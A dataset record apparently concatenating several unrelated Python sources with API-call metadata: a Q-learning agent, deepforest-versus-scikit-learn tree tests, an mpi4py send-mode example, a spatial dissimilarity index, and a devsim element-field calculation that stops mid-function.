2488), True, 'import taichi as ti\n'), ((2723, 2749), 'taichi.Vector', 'ti.Vector', (['[0.8, 0.5, 0.4]'], {}), '([0.8, 0.5, 0.4])\n', (2732, 2749), True, 'import taichi as ti\n'), ((3029, 3055), 'taichi.Vector', 'ti.Vector', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (3038, 3055), True, 'import taichi as ti\n'), ((3341, 3367), 'taichi.Vector', 'ti.Vector', (['[0.0, 1.0, 0.0]'], {}), '([0.0, 1.0, 0.0])\n', (3350, 3367), True, 'import taichi as ti\n'), ((3653, 3679), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (3662, 3679), True, 'import taichi as ti\n'), ((3963, 3989), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (3972, 3989), True, 'import taichi as ti\n'), ((4272, 4298), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (4281, 4298), True, 'import taichi as ti\n'), ((5835, 5847), 'numpy.sqrt', 'np.sqrt', (['img'], {}), '(img)\n', (5842, 5847), True, 'import numpy as np\n'), ((1969, 1980), 'taichi.random', 'ti.random', ([], {}), '()\n', (1978, 1980), True, 'import taichi as ti\n'), ((2010, 2027), 'renderer_utils.reflect', 'reflect', (['indir', 'n'], {}), '(indir, n)\n', (2017, 2027), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((1265, 1291), 'taichi.Vector', 'ti.Vector', (['[0.0, 1.0, 0.0]'], {}), '([0.0, 1.0, 0.0])\n', (1274, 1291), True, 'import taichi as ti\n'), ((1445, 1456), 'taichi.cos', 'ti.cos', (['phi'], {}), '(phi)\n', (1451, 1456), True, 'import taichi as ti\n'), ((1463, 1474), 'taichi.sin', 'ti.sin', (['phi'], {}), '(phi)\n', (1469, 1474), True, 'import taichi as ti\n'), ((5654, 5665), 'time.time', 'time.time', ([], {}), '()\n', (5663, 5665), False, 'import time\n'), ((4524, 4535), 'taichi.random', 'ti.random', ([], {}), '()\n', (4533, 4535), True, 'import taichi as ti\n'), ((4604, 4615), 'taichi.random', 'ti.random', ([], {}), '()\n', (4613, 4615), True, 'import taichi as 
ti\n')] |
import numpy as np
class QAgent(object):
    """Tabular Q-learning agent (taken from tf_rl/examples/Q_Learning)."""

    def __init__(self, num_state, num_action, gamma=0.95):
        self._num_action = num_action
        self._gamma = gamma
        # Q-table: one row per state, one column per action, initialized to 0.
        self.Q = np.zeros((num_state, num_action))

    def select_action(self, state, epsilon=1.0):
        """Epsilon-greedy action selection for the given state."""
        if np.random.random() > epsilon:
            # Exploit: best known action for this state.
            return np.argmax(self.Q[state])
        # Explore: draw uniformly over all actions.
        uniform = np.ones(self._num_action) / self._num_action
        return np.random.choice(a=np.arange(self._num_action), p=uniform)

    def select_action_eval(self, state):
        """Greedy action (no exploration), used at evaluation time."""
        return np.argmax(self.Q[state])

    def update(self, state, action, reward, next_state, alpha):
        """One tabular Q-learning update with learning rate `alpha`."""
        # === I don't know why tho, self.gamma = 0.99 does not converge in Q-learning ===
        # The discount factor is deliberately hard-coded to 1.0 (see the note
        # above); self._gamma is stored but intentionally unused here.
        td_target = reward + 1. * np.max(self.Q[next_state])
        self.Q[state][action] += alpha * (td_target - self.Q[state][action])
"numpy.argmax",
"numpy.zeros",
"numpy.ones",
"numpy.max",
"numpy.random.random",
"numpy.arange"
] | [((234, 267), 'numpy.zeros', 'np.zeros', (['(num_state, num_action)'], {}), '((num_state, num_action))\n', (242, 267), True, 'import numpy as np\n'), ((590, 614), 'numpy.argmax', 'np.argmax', (['self.Q[state]'], {}), '(self.Q[state])\n', (599, 614), True, 'import numpy as np\n'), ((329, 347), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (345, 347), True, 'import numpy as np\n'), ((508, 532), 'numpy.argmax', 'np.argmax', (['self.Q[state]'], {}), '(self.Q[state])\n', (517, 532), True, 'import numpy as np\n'), ((398, 425), 'numpy.arange', 'np.arange', (['self._num_action'], {}), '(self._num_action)\n', (407, 425), True, 'import numpy as np\n'), ((429, 454), 'numpy.ones', 'np.ones', (['self._num_action'], {}), '(self._num_action)\n', (436, 454), True, 'import numpy as np\n'), ((944, 970), 'numpy.max', 'np.max', (['self.Q[next_state]'], {}), '(self.Q[next_state])\n', (950, 970), True, 'import numpy as np\n')] |
"""
Testing cases here make sure that the outputs of the reduced implementation
on `DecisionTreeClassifier` and `ExtraTreeClassifier` are exactly the same as
the original version in Scikit-Learn after the data binning.
"""
import pytest
from numpy.testing import assert_array_equal
from sklearn.tree import (
DecisionTreeClassifier as sklearn_DecisionTreeClassifier,
)
from sklearn.tree import (
DecisionTreeRegressor as sklearn_DecisionTreeRegressor,
)
from sklearn.tree import ExtraTreeClassifier as sklearn_ExtraTreeClassifier
from sklearn.tree import ExtraTreeRegressor as sklearn_ExtraTreeRegressor
# Load utils
from sklearn.model_selection import train_test_split
from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper
# Toy classification datasets
from sklearn.datasets import load_iris, load_wine, load_boston
from deepforest import DecisionTreeClassifier
from deepforest import ExtraTreeClassifier
from deepforest import DecisionTreeRegressor
from deepforest import ExtraTreeRegressor
test_size = 0.42
random_state = 42


def _binned_data(load_func):
    """Load a toy dataset, split it, and bin the features with _BinMapper.

    Returns (X_train_binned, X_test_binned, y_train).
    """
    X, y = load_func(return_X_y=True)
    X_train, X_test, y_train, _ = train_test_split(
        X, y, test_size=test_size, random_state=random_state
    )
    # Data binning
    binner = _BinMapper(random_state=random_state)
    return binner.fit_transform(X_train), binner.transform(X_test), y_train


def _assert_same_as_sklearn(load_func, ours_cls, sklearn_cls, check_proba):
    """Fit our reduced estimator and the Scikit-Learn reference on identical
    binned data and assert their predictions (and, for classifiers, their
    probabilities) are exactly equal."""
    X_train_binned, X_test_binned, y_train = _binned_data(load_func)

    # Ours
    ours = ours_cls(random_state=random_state)
    ours.fit(X_train_binned, y_train)

    # Sklearn
    ref = sklearn_cls(random_state=random_state)
    ref.fit(X_train_binned, y_train)

    assert_array_equal(ours.predict(X_test_binned), ref.predict(X_test_binned))
    if check_proba:
        assert_array_equal(
            ours.predict_proba(X_test_binned), ref.predict_proba(X_test_binned)
        )


@pytest.mark.parametrize("load_func", [load_iris, load_wine])
def test_tree_classifier_proba(load_func):
    _assert_same_as_sklearn(
        load_func, DecisionTreeClassifier, sklearn_DecisionTreeClassifier, True
    )


@pytest.mark.parametrize("load_func", [load_iris, load_wine])
def test_extra_tree_classifier_proba(load_func):
    _assert_same_as_sklearn(
        load_func, ExtraTreeClassifier, sklearn_ExtraTreeClassifier, True
    )


@pytest.mark.parametrize("load_func", [load_boston])
def test_tree_regressor_pred(load_func):
    _assert_same_as_sklearn(
        load_func, DecisionTreeRegressor, sklearn_DecisionTreeRegressor, False
    )


@pytest.mark.parametrize("load_func", [load_boston])
def test_extra_tree_regressor_pred(load_func):
    _assert_same_as_sklearn(
        load_func, ExtraTreeRegressor, sklearn_ExtraTreeRegressor, False
    )
| [
"sklearn.tree.DecisionTreeRegressor",
"sklearn.model_selection.train_test_split",
"numpy.testing.assert_array_equal",
"deepforest.DecisionTreeClassifier",
"sklearn.tree.DecisionTreeClassifier",
"sklearn.tree.ExtraTreeRegressor",
"deepforest.ExtraTreeClassifier",
"deepforest.DecisionTreeRegressor",
"... | [((1062, 1122), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""load_func"""', '[load_iris, load_wine]'], {}), "('load_func', [load_iris, load_wine])\n", (1085, 1122), False, 'import pytest\n'), ((2047, 2107), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""load_func"""', '[load_iris, load_wine]'], {}), "('load_func', [load_iris, load_wine])\n", (2070, 2107), False, 'import pytest\n'), ((3031, 3082), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""load_func"""', '[load_boston]'], {}), "('load_func', [load_boston])\n", (3054, 3082), False, 'import pytest\n'), ((3840, 3891), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""load_func"""', '[load_boston]'], {}), "('load_func', [load_boston])\n", (3863, 3891), False, 'import pytest\n'), ((1244, 1314), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': 'test_size', 'random_state': 'random_state'}), '(X, y, test_size=test_size, random_state=random_state)\n', (1260, 1314), False, 'from sklearn.model_selection import train_test_split\n'), ((1362, 1399), 'sklearn.ensemble._hist_gradient_boosting.binning._BinMapper', '_BinMapper', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (1372, 1399), False, 'from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper\n'), ((1520, 1569), 'deepforest.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (1542, 1569), False, 'from deepforest import DecisionTreeClassifier\n'), ((1737, 1794), 'sklearn.tree.DecisionTreeClassifier', 'sklearn_DecisionTreeClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (1767, 1794), True, 'from sklearn.tree import DecisionTreeClassifier as sklearn_DecisionTreeClassifier\n'), ((1944, 1990), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_pred', 'expected_pred'], {}), '(actual_pred, expected_pred)\n', (1962, 
1990), False, 'from numpy.testing import assert_array_equal\n'), ((1995, 2043), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_proba', 'expected_proba'], {}), '(actual_proba, expected_proba)\n', (2013, 2043), False, 'from numpy.testing import assert_array_equal\n'), ((2234, 2304), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': 'test_size', 'random_state': 'random_state'}), '(X, y, test_size=test_size, random_state=random_state)\n', (2250, 2304), False, 'from sklearn.model_selection import train_test_split\n'), ((2352, 2389), 'sklearn.ensemble._hist_gradient_boosting.binning._BinMapper', '_BinMapper', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (2362, 2389), False, 'from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper\n'), ((2510, 2556), 'deepforest.ExtraTreeClassifier', 'ExtraTreeClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (2529, 2556), False, 'from deepforest import ExtraTreeClassifier\n'), ((2724, 2778), 'sklearn.tree.ExtraTreeClassifier', 'sklearn_ExtraTreeClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (2751, 2778), True, 'from sklearn.tree import ExtraTreeClassifier as sklearn_ExtraTreeClassifier\n'), ((2928, 2974), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_pred', 'expected_pred'], {}), '(actual_pred, expected_pred)\n', (2946, 2974), False, 'from numpy.testing import assert_array_equal\n'), ((2979, 3027), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_proba', 'expected_proba'], {}), '(actual_proba, expected_proba)\n', (2997, 3027), False, 'from numpy.testing import assert_array_equal\n'), ((3202, 3272), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': 'test_size', 'random_state': 'random_state'}), '(X, y, test_size=test_size, random_state=random_state)\n', (3218, 3272), False, 'from 
sklearn.model_selection import train_test_split\n'), ((3320, 3357), 'sklearn.ensemble._hist_gradient_boosting.binning._BinMapper', '_BinMapper', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (3330, 3357), False, 'from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper\n'), ((3478, 3526), 'deepforest.DecisionTreeRegressor', 'DecisionTreeRegressor', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (3499, 3526), False, 'from deepforest import DecisionTreeRegressor\n'), ((3640, 3696), 'sklearn.tree.DecisionTreeRegressor', 'sklearn_DecisionTreeRegressor', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (3669, 3696), True, 'from sklearn.tree import DecisionTreeRegressor as sklearn_DecisionTreeRegressor\n'), ((3790, 3836), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_pred', 'expected_pred'], {}), '(actual_pred, expected_pred)\n', (3808, 3836), False, 'from numpy.testing import assert_array_equal\n'), ((4016, 4086), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': 'test_size', 'random_state': 'random_state'}), '(X, y, test_size=test_size, random_state=random_state)\n', (4032, 4086), False, 'from sklearn.model_selection import train_test_split\n'), ((4134, 4171), 'sklearn.ensemble._hist_gradient_boosting.binning._BinMapper', '_BinMapper', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (4144, 4171), False, 'from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper\n'), ((4292, 4337), 'deepforest.ExtraTreeRegressor', 'ExtraTreeRegressor', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (4310, 4337), False, 'from deepforest import ExtraTreeRegressor\n'), ((4451, 4504), 'sklearn.tree.ExtraTreeRegressor', 'sklearn_ExtraTreeRegressor', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (4477, 4504), True, 'from sklearn.tree import 
ExtraTreeRegressor as sklearn_ExtraTreeRegressor\n'), ((4598, 4644), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_pred', 'expected_pred'], {}), '(actual_pred, expected_pred)\n', (4616, 4644), False, 'from numpy.testing import assert_array_equal\n')] |
## mpiexec -n 2 python ex-2.34.py

# Use of ready-mode and synchronous-mode sends.
# --------------------------------------------------------------------

from mpi4py import MPI
try:
    import numpy
except ImportError:
    raise SystemExit

# The example needs at least two ranks (a sender and a receiver).
if MPI.COMM_WORLD.Get_size() < 2:
    raise SystemExit

# --------------------------------------------------------------------

comm = MPI.COMM_WORLD

# Column-major layout so each column is one contiguous 1000-float message
# buffer. 'F' is the spelling documented by numpy for Fortran order (the
# original 'fortran' is not a documented value).
buff = numpy.empty((1000, 2), dtype='f', order='F')

rank = comm.Get_rank()

if rank == 0:
    # Post both receives before rank 1 issues its ready-mode send: a
    # ready-mode send is erroneous unless the matching receive is already
    # posted.
    req1 = comm.Irecv([buff[:, 0], MPI.FLOAT], 1, 1)
    req2 = comm.Irecv([buff[:, 1], MPI.FLOAT], 1, 2)
    status = [MPI.Status(), MPI.Status()]
    MPI.Request.Waitall([req1, req2], status)
elif rank == 1:
    buff[:, 0] = 5
    buff[:, 1] = 7
    # The synchronous send (tag 2) completes only after the receiver has
    # started the matching receive. Since rank 0 posts the tag-1 receive
    # before the tag-2 one, both receives are guaranteed to be posted by
    # the time the ready-mode send (tag 1) below is issued.
    comm.Ssend([buff[:, 1], MPI.FLOAT], 0, 2)
    comm.Rsend([buff[:, 0], MPI.FLOAT], 0, 1)

# --------------------------------------------------------------------

# Verify the received data and message envelopes on the receiving rank.
# (numpy.all is called directly instead of rebinding the builtin `all`.)
if rank == 0:
    assert numpy.all(buff[:, 0] == 5)
    assert numpy.all(buff[:, 1] == 7)
    assert status[0].source == 1
    assert status[0].tag == 1
    assert status[1].source == 1
    assert status[1].tag == 2

# --------------------------------------------------------------------
"numpy.empty",
"mpi4py.MPI.Status",
"mpi4py.MPI.COMM_WORLD.Get_size",
"mpi4py.MPI.Request.Waitall"
] | [((393, 443), 'numpy.empty', 'numpy.empty', (['(1000, 2)'], {'dtype': '"""f"""', 'order': '"""fortran"""'}), "((1000, 2), dtype='f', order='fortran')\n", (404, 443), False, 'import numpy\n'), ((238, 263), 'mpi4py.MPI.COMM_WORLD.Get_size', 'MPI.COMM_WORLD.Get_size', ([], {}), '()\n', (261, 263), False, 'from mpi4py import MPI\n'), ((634, 675), 'mpi4py.MPI.Request.Waitall', 'MPI.Request.Waitall', (['[req1, req2]', 'status'], {}), '([req1, req2], status)\n', (653, 675), False, 'from mpi4py import MPI\n'), ((602, 614), 'mpi4py.MPI.Status', 'MPI.Status', ([], {}), '()\n', (612, 614), False, 'from mpi4py import MPI\n'), ((616, 628), 'mpi4py.MPI.Status', 'MPI.Status', ([], {}), '()\n', (626, 628), False, 'from mpi4py import MPI\n')] |
"""Boundary Spatial Dissimilarity Index."""
__author__ = "<NAME> <<EMAIL>>, <NAME> <<EMAIL>> and <NAME> <<EMAIL>>"
import numpy as np
from sklearn.metrics.pairwise import manhattan_distances
from .._base import (SingleGroupIndex, SpatialExplicitIndex,
_return_length_weighted_w)
from .dissim import _dissim
def _boundary_spatial_dissim(data, group_pop_var, total_pop_var, standardize=False):
    """Calculation of Boundary Spatial Dissimilarity index.

    Parameters
    ----------
    data : a geopandas DataFrame with a geometry column.
    group_pop_var : string
        The name of variable in data that contains the population size of the group of interest
    total_pop_var : string
        The name of variable in data that contains the total population of the unit
    standardize : boolean
        A condition for row standardisation of the weights matrices. If True, the values of cij in the formulas gets row standardized.
        For the sake of comparison, the seg R package of Hong, Seong-Yun, David O'Sullivan, and Yukio Sadahiro. "Implementing spatial segregation measures in R." PloS one 9.11 (2014): e113767.
        works by default without row standardization. That is, directly with border length.

    Returns
    ----------
    statistic : float
        Boundary Spatial Dissimilarity Index
    core_data : a geopandas DataFrame
        A geopandas DataFrame that contains the columns used to perform the estimate.

    Notes
    -----
    The formula is based on Hong, Seong-Yun, David O'Sullivan, and Yukio Sadahiro. "Implementing spatial segregation measures in R." PloS one 9.11 (2014): e113767.

    Original paper by Wong, <NAME>. "Spatial indices of segregation." Urban studies 30.3 (1993): 559-572.

    References: :cite:`hong2014implementing` and :cite:`wong1993spatial`.
    """
    if not isinstance(standardize, bool):
        raise TypeError("std is not a boolean object")

    # Aspatial dissimilarity index D of the same data.
    D = _dissim(data, group_pop_var, total_pop_var)[0]

    # If a unit has zero population, the group of interest frequency is zero
    data = data.assign(
        pi=np.where(
            data[total_pop_var] == 0, 0, data[group_pop_var] / data[total_pop_var]
        )
    )

    # Shared-border-length weights between adjacent units; computed once and
    # row-standardized only when requested (the original recomputed it in
    # both branches).
    cij = _return_length_weighted_w(data).full()[0]
    if standardize:
        cij = cij / cij.sum(axis=1).reshape((cij.shape[0], 1))

    # manhattan_distances used to compute absolute distances |pi_i - pi_j|
    num = np.multiply(manhattan_distances(data[["pi"]]), cij).sum()
    den = cij.sum()
    BSD = D - num / den
    core_data = data[[group_pop_var, total_pop_var, data.geometry.name]]

    return BSD, core_data
class BoundarySpatialDissim(SingleGroupIndex, SpatialExplicitIndex):
    """Boundary-Area Dissimilarity Index.

    Parameters
    ----------
    data : pandas.DataFrame or geopandas.GeoDataFrame, required
        dataframe or geodataframe if spatial index holding data for location of interest
    group_pop_var : str, required
        name of column on dataframe holding population totals for focal group
    total_pop_var : str, required
        name of column on dataframe holding total overall population
    standardize : boolean
        A condition for row standardisation of the weights matrices. If True, the values of cij in the formulas gets row standardized.
        For the sake of comparison, the seg R package of Hong, Seong-Yun, <NAME>, and <NAME>. "Implementing spatial segregation measures in R." PloS one 9.11 (2014): e113767.
        works by default with row standardization.

    Attributes
    ----------
    statistic : float
        Boundary Area Index
    core_data : a pandas DataFrame
        A pandas DataFrame that contains the columns used to perform the estimate.

    Notes
    -----
    The formula is based on Hong, Seong-Yun, <NAME>, and <NAME>. "Implementing spatial segregation measures in R." PloS one 9.11 (2014): e113767.

    Original paper by Wong, <NAME>. "Spatial indices of segregation." Urban studies 30.3 (1993): 559-572.

    References: :cite:`hong2014implementing` and :cite:`wong1993spatial`.
    """

    def __init__(
        self, data, group_pop_var, total_pop_var, w=None, standardize=True, **kwargs
    ):
        """Init."""
        SingleGroupIndex.__init__(self, data, group_pop_var, total_pop_var)
        SpatialExplicitIndex.__init__(self)
        self.standardize = standardize
        # Delegate the actual computation to the module-level function and
        # unpack its (statistic, core_data) result directly.
        self.statistic, self.core_data = _boundary_spatial_dissim(
            self.data, self.group_pop_var, self.total_pop_var, self.standardize
        )
        self._function = _boundary_spatial_dissim
| [
"numpy.where",
"sklearn.metrics.pairwise.manhattan_distances"
] | [((2119, 2204), 'numpy.where', 'np.where', (['(data[total_pop_var] == 0)', '(0)', '(data[group_pop_var] / data[total_pop_var])'], {}), '(data[total_pop_var] == 0, 0, data[group_pop_var] / data[total_pop_var]\n )\n', (2127, 2204), True, 'import numpy as np\n'), ((2522, 2555), 'sklearn.metrics.pairwise.manhattan_distances', 'manhattan_distances', (["data[['pi']]"], {}), "(data[['pi']])\n", (2541, 2555), False, 'from sklearn.metrics.pairwise import manhattan_distances\n')] |
# Copyright 2013 Devsim LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The purpose is to verify our triangle element field calculation.
# It is based on Laux's weighting scheme
#@article{Laux:1985,
# author = {Laux, <NAME>. and Byrnes, <NAME>.},
# title = {Semiconductor device simulation using generalized mobility models},
# journal = {IBM J. Res. Dev.},
# issue_date = {May 1985},
# volume = {29},
# number = {dim},
# month = may,
# year = {1985},
# issn = {0018-8646},
# pages = {289--301},
# numpages = {13},
# url = {http://dx.doi.org/10.1147/rd.293.0289},
# doi = {10.1147/rd.293.0289},
# acmid = {1012099},
# publisher = {IBM Corp.},
# address = {Riverton, NJ, USA},
#}
# handle the new way of integer division
from __future__ import division
import sys
# Bail out gracefully when numpy is unavailable; the whole test needs it.
try:
    import numpy
    import numpy.linalg
except ImportError:
    # Only catch import failures -- the original bare ``except`` would also
    # swallow KeyboardInterrupt and SystemExit.
    print("numpy is not available with your installation and is not being run")
    sys.exit(0)
from devsim import *
#from collections import OrderedDict
dim = None
nee = None
nen = None
directions = ('x', 'y', 'z')
def SetDimension(dimension):
    """Configure the module-level mesh constants for a 2D or 3D run.

    Sets the globals:
      dim -- spatial dimension (2 or 3)
      nee -- edges per element (3 for triangles, 6 for tetrahedra)
      nen -- nodes per element (3 for triangles, 4 for tetrahedra)

    Raises
    ------
    ValueError
        If ``dimension`` is neither 2 nor 3.  Previously an invalid value was
        silently ignored, leaving the globals set to ``None`` and causing a
        confusing failure much later.
    """
    global dim
    global nee
    global nen
    if dimension == 2:
        dim = 2
        nee = 3
        nen = 3
    elif dimension == 3:
        dim = 3
        nee = 6
        nen = 4
    else:
        raise ValueError("dimension must be 2 or 3, got %r" % (dimension,))
# nen edges make up the dense matrix calculation for 1 node
# the element corresponds to 1 of n tetrahedron
# node indexes are the element edge quantities
def GetElementData(element_index, node_indexes):
    """Collect per-element bookkeeping for one element.

    Parameters
    ----------
    element_index : int
        Index of the element (triangle/tetrahedron) being processed.
    node_indexes : list of lists
        One list per element-node position; entry [i][nee*e + j] is the node
        id at position i of edge j of element e (from GetNodeIndexes).

    Returns a dict with:
      'edge_node_list'       -- per edge, the node ids attached to that edge
      'node_indexes'         -- sorted node ids of the element
      'node_to_edge_indexes' -- per element node, the local edge indexes
                                whose head or tail is that node
      'element_index'        -- the input element index

    Relies on the module globals ``nee`` (edges per element) set by
    SetDimension().
    """
    element_data = {}
    nodes = []
    edge_node_list = []
    # Gather, for each of the nee local edges, the node ids recorded at every
    # element-node position for that edge.
    for j in range(nee):
        index = nee*element_index + j
        enodes = []
        for i in node_indexes:
            enodes.append(i[index])
        edge_node_list.append(enodes)
    element_data['edge_node_list'] = edge_node_list
    # All element nodes appear in edge 0's list; sort for a stable ordering.
    nodes = sorted(edge_node_list[0])
    element_data['node_indexes'] = nodes
    node_to_edge_indexes = []
    # Positions 0 and 1 are the tail and head nodes of each edge.
    n0_indexes = node_indexes[0]
    n1_indexes = node_indexes[1]
    for ni in nodes:
        edge_indexes = []
        for j in range(nee):
            ei = nee*element_index + j
            # Edge j touches node ni if ni is either of its end nodes.
            if (n0_indexes[ei] == ni) or (n1_indexes[ei] == ni):
                edge_indexes.append(j)
        node_to_edge_indexes.append(edge_indexes)
    element_data['node_to_edge_indexes'] = node_to_edge_indexes
    element_data['element_index'] = element_index
    return element_data
def GetNodeMatrices(element_data, unit_vectors):
    """For every element node, build the dim x dim matrix whose rows are the
    unit vectors of the (first ``dim``) edges incident to that node.

    These matrices are later solved against per-edge scalar fields to
    reconstruct a vector field at each node (Laux's scheme).
    """
    element_index = element_data['element_index']
    per_node_edges = element_data['node_to_edge_indexes']
    matrices = []
    for node in range(nen):
        local_edges = per_node_edges[node]
        M = numpy.zeros((dim, dim))
        for row in range(dim):
            # Translate the node-local edge index to the global edge index.
            global_edge = nee * element_index + local_edges[row]
            for col in range(dim):
                M[row, col] = unit_vectors[col][global_edge]
        matrices.append(M)
    return matrices
def CalculateEField(element_data, scalar_efield):
    """Reconstruct a vector electric field at each element node.

    For node i, solves M_i * E = b where M_i holds the unit vectors of the
    edges at the node (from GetNodeMatrices) and b holds the scalar
    (edge-projected) field values on those edges.

    Returns a list of nen (dim, 1) column vectors.
    """
    # calculated for each of the nen nodes on the element
    vector_efields = []
    ei = element_data['element_index']
    matrices = element_data['matrices']
    for i in range(nen):
        edge_indexes = element_data['node_to_edge_indexes'][i]
        B = numpy.zeros((dim,1))
        for j in range(dim):
            # global edge index of the j-th edge incident to node i
            edge_index = nee * ei + edge_indexes[j]
            B[j] = scalar_efield[edge_index]
        ans = numpy.linalg.solve(matrices[i], B)
        vector_efields.append(ans)
    return vector_efields
def CalculateEFieldDerivatives(element_data, scalar_efield_derivatives):
    """Reconstruct, per element node, the derivatives of the vector field
    with respect to the potential at every element node.

    Solves the same per-node matrix as CalculateEField, but with a
    (dim, nen) right-hand side: column k is the derivative with respect to
    element node k.  ``scalar_efield_derivatives`` is a pair of arrays with
    the per-edge derivatives with respect to the edge's node 0 and node 1.
    """
    vector_efield_derivatives = []
    ei = element_data['element_index']
    matrices = element_data['matrices']
    # These are the derivatives for all of the nodes of the whole element
    node_indexes = element_data['node_indexes']
    for i in range(nen):
        edge_indexes = element_data['node_to_edge_indexes'][i]
        B = numpy.zeros((dim,nen))
        for j in range(dim):
            edge_index = edge_indexes[j]
            input_edge_index = nee * ei + edge_index
            edge_node_list = element_data['edge_node_list'][edge_index]
            # these are the derivative nodes corresponding to this edge
            for k in range(nen):
                # this is the node we are taking the derivative with respect to
                # it is over the entire element
                nk = node_indexes[k]
                # are we in the head or tail node; the derivative is zero when
                # the edge does not involve node nk
                val = 0.0
                if nk == edge_node_list[0]:
                    val = scalar_efield_derivatives[0][input_edge_index]
                elif nk == edge_node_list[1]:
                    val = scalar_efield_derivatives[1][input_edge_index]
                B[j][k] = val
        ans = numpy.linalg.solve(matrices[i], B)
        vector_efield_derivatives.append(ans)
    return vector_efield_derivatives
def CalculateFinalValues3D(element_data, vector_efields, output):
    """Accumulate the 3D element vector field onto the per-edge output rows.

    Each edge receives half of the node-reconstructed field from each of its
    participating nodes (the 0.5 weighting averages the two contributions).
    Writes into output[:, 0:dim] in place.
    """
    ei = element_data['element_index']
    node_indexes = element_data['node_indexes']
    edge_node_list = element_data['edge_node_list']
    for i in range(nen):
        edge_indexes = element_data['node_to_edge_indexes'][i]
        # half weight: each edge gets contributions from two nodes
        val = 0.5 * numpy.transpose(vector_efields[i][:,0])
        for j in range(dim):
            edge_index = edge_indexes[j]
            output_edge_index = nee*ei + edge_index
            output[output_edge_index,0:dim] += val
def CalculateFinalDerivatives3D(element_data, vector_efield_derivatives, output):
    """Accumulate the 3D per-edge derivatives into the output columns.

    Column layout of ``output``: values occupy [0:dim]; the derivative with
    respect to the edge's (kk+1)-th listed node occupies
    [dim*(kk+1):dim*(kk+2)].  Writes in place.
    """
    # now for the derivatives
    ei = element_data['element_index']
    node_indexes = element_data['node_indexes']
    edge_node_list = element_data['edge_node_list']
    for i in range(nen):
        edge_indexes = element_data['node_to_edge_indexes'][i]
        for j in range(dim):
            edge_index = edge_indexes[j]
            output_edge_index = nee*ei + edge_index
            for k in range(nen):
                # these are the derivatives corresponding to the ordered list of nodes on the entire element
                nk = node_indexes[k]
                val = 0.5 * numpy.transpose(vector_efield_derivatives[i][:,k])
                for kk in range(nen):
                    nkk = edge_node_list[edge_index][kk]
                    if nk == nkk:
                        # kk is this node's position in the edge's node list;
                        # shift by one block to skip the value columns
                        row_stride = slice(dim*(kk+1),dim*(kk+2))
                        output[output_edge_index, row_stride] += val
def CalculateFinalValues2D(element_data, vector_efields, ecouple, output):
    """Combine the 2D node fields into per-edge values with couple weighting.

    Each edge's value is a weighted average of the fields reconstructed at
    its nodes; the weight for a contribution through edge j is the element
    edge couple of the *other* edge k at the same node.  Writes
    output[:, 0:dim] in place.
    """
    ei = element_data['element_index']
    # this is special weighting based on edge away from edge of interest
    wts = numpy.zeros((nee,)) # this handles the weights summed into our edge
    outs = numpy.zeros((nee,dim))
    # iterate over our element nodes
    node_to_edge_indexes = element_data['node_to_edge_indexes']
    for i in range(nen):
        edge_indexes = node_to_edge_indexes[i]
        for j in edge_indexes:
            for k in edge_indexes:
                if j == k:
                    continue
                wt = ecouple[nee*ei + k]
                wts[j] += wt
                outs[j] += wt * vector_efields[i][:,0]
    # normalize by the accumulated weights and write back per edge
    for i in range(nee):
        outs[i] /= wts[i]
        output[nee*ei + i,0:dim] = numpy.transpose(outs[i])
def CalculateFinalDerivatives2D(element_data, vector_efield_derivatives, ecouple, output):
    """Combine the 2D per-node derivative blocks into per-edge derivatives.

    Uses the same edge-couple weighting as CalculateFinalValues2D, then maps
    each element-node derivative block into the output column block for that
    node's position within the edge's node list.  Writes in place.
    """
    ei = element_data['element_index']
    # this is special weighting based on edge away from edge of interest
    wts = numpy.zeros((nee,)) # this handles the weights summed into our edge
    outs = numpy.zeros((nee,nen*dim))
    # iterate over our element nodes
    node_indexes = element_data['node_indexes']
